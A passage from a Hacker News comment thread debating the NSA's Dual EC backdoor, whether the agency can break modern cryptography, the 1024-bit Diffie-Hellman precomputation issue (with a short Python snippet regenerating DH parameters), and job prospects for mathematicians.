       | as the US gov is not too evil or not too corrupt. As long as
       | other dangerous governments or criminals can't do too much cyber
       | damage, things are fine.
       | 
       | I'm still curious if ML can create new kinds of cryptography.
       | 
       | Maybe a time will come where China/Russia will have enough
       | expertise to break good enough crypto, and then the cyber
       | battlefield will really change.
        
         | tsimionescu wrote:
          | > In the end, I don't think anybody has a good enough reason to
         | hide stuff from the US government, at least that's my opinion,
         | as long as the US gov is not too evil or not too corrupt. As
         | long as other dangerous governments or criminals can't do too
         | much cyber damage, things are fine.
         | 
         | Such a bizarre take. The US government is one of the most
         | belligerent and feared governments in the world, with a known
          | track record of starting wars, toppling democratic governments
         | that are opposed to them, ignoring international law,
         | prioritizing US corporations over any local peoples. China and
         | Russia aren't even half as scary to the vast majority of the
         | planet.
        
           | phendrenad2 wrote:
           | Most people have NOT had a war started on them by the US
           | government, so the take makes sense.
        
         | marcan_42 wrote:
         | This has nothing to do with brain power. This was a
         | deliberately backdoored algorithm that any cryptographer
         | familiar with elliptic curve cryptography could've come up
         | with. It wasn't even good or clever, seeing as people saw
         | through it almost immediately. The only thing it had going for
         | it is it was plausibly deniable and that allowed the US
         | government to force people to implement it, since nobody could
         | prove the NSA really had the secret keys.
         | 
          | Stuff like this is, on the contrary, evidence that the NSA
          | _can't_ break modern cryptography. If they could, they wouldn't
         | need to try to push through blatant backdoors like this.
         | 
         | If you want to be safe from the NSA, use well-vetted, simple,
         | auditable cryptography tools. The NSA doesn't break real crypto
         | any more, they just find or make software bugs.
         | 
         | The only "thing the NSA has probably broken" that comes to mind
         | in the modern crypto world is when people realized that you
          | could do a one-time mass computation for fixed parameters for
         | n-bit Diffie-Hellman and then use the result to decrypt any
          | communications that used them, efficiently... which was a
         | bit of a problem when tons of software around the world was
         | using default parameters, often 1024-bit, which is in "the NSA
         | can almost certainly break it" range. I remember when that
         | happened, I went through all my servers and re-generated my own
         | dh parameters for OpenSSL, at 4096 bits. But this wasn't a
         | particularly mind blowing idea, it was more like an "oh shit"
         | moment since everyone knew the NSA had the storage/compute
         | budget to actually carry out this attack. But anyone serious
         | about crypto shouldn't have been using 1024-bit DH anyway; it
         | was just a failure of the ecosystem that nobody had proactively
         | deprecated such small sizes.
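          | 
          | (For reference, that re-generation step is a single call; a
          | sketch with the pyca/cryptography package, 2048 bits here
          | only because 4096 takes a long time to generate:)
          | 
          |   from cryptography.hazmat.primitives import serialization
          |   from cryptography.hazmat.primitives.asymmetric import dh
          | 
          |   # a fresh group: precomputation against the well-known
          |   # default primes buys an attacker nothing against this one
          |   params = dh.generate_parameters(generator=2, key_size=2048)
          |   with open("dhparams.pem", "wb") as f:
          |       f.write(params.parameter_bytes(
          |           serialization.Encoding.PEM,
          |           serialization.ParameterFormat.PKCS3))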
        
           | sjaak wrote:
           | > Stuff like this is, on the contrary, evidence that the NSA
           | can't break modern cryptography.
           | 
           | Unless they're one step ahead here and they _want us to think
            | that_, which is why they add backdoors knowing that years
           | later that knowledge will become public, giving us all a
           | reason to think they cannot break modern crypto.
           | 
           | <takes off his tinfoil hat>
        
             | dylan604 wrote:
             | or taking the false flag further to be able to say that all
              | crypto is weak and has flaws, so might as well forgo it.
              | Sure would make everyone's job easier.
        
             | atatatat wrote:
             | Tinfoil acts as a receiver...
        
           | sangnoir wrote:
           | > The NSA doesn't break real crypto any more, they just find
           | or make software bugs.
           | 
            | They still can, and do, break crypto. The Snowden papers
           | (IIRC) mentioned that NSA factored a bunch of primes by
           | throwing ridiculous amounts of compute at it: billions of
           | dollars.
           | 
            | With that, they could break schemes with no forward secrecy at
           | their leisure (from all the historical internet traffic they
           | had gathered), and they could decrypt ~30% of all "secure"
            | internet connections _in real time_ at the time, IIRC.
        
             | sroussey wrote:
             | And vulnerabilities are constantly discovered, so they can
             | go back to the recorded internet and break it.
        
             | Y_Y wrote:
             | That's easy when you know the secret. Give me any prime, as
             | big as you like, and I'll factor it for you right now.
        
             | marcan_42 wrote:
             | You're describing the Diffie-Hellman story I mentioned (in
             | a somewhat confusing way; forward secrecy isn't involved
             | here, this isn't about breaking RSA TLS keys, and in fact
             | DH is used in connections _with_ forward secrecy). Again,
             | that only works for 1024 bit DH schemes. The NSA can 't
             | factor 2048 bit keys, and they _definitely_ can 't factor
             | 4096 bit keys. These aren't unknown capabilities; it's
             | pretty easy to get an order of magnitude estimate on how
             | much compute power the NSA has (spoiler alert: Google has
             | more).
        
         | dylan604 wrote:
          | >I've heard the NSA is one of the biggest employers of math
         | people.
         | 
         | What are the other options for pure maths people? Academia?
          | Does that really pay any better? Plus, depending on your
          | teaching level, there's a good chance you're just a babysitter.
         | A cush gov't job probably sounds pretty good where you will
         | actively be using your skills on a daily basis.
         | 
          | Are there FAANG opportunities for math people at the same level
         | as gov't?
        
           | Y_Y wrote:
           | Finance is a good one. Academia is really hard to make any
           | money in, if you can even get a job. Otherwise you can slide
           | into stats or some applied field and do some consulting or
           | something.
        
       | mindslight wrote:
       | Was this modified Dual EC ever used for actual sessions? It's my
       | recollection that programs offered Dual EC as an option, but
       | never the default one. And nobody enabled it because it was slow,
        | and had little advantage. But perhaps that was different with the
        | NSA mandating standards for government use?
        
       ___________________________________________________________________
       (page generated 2021-09-03 23:03 UTC)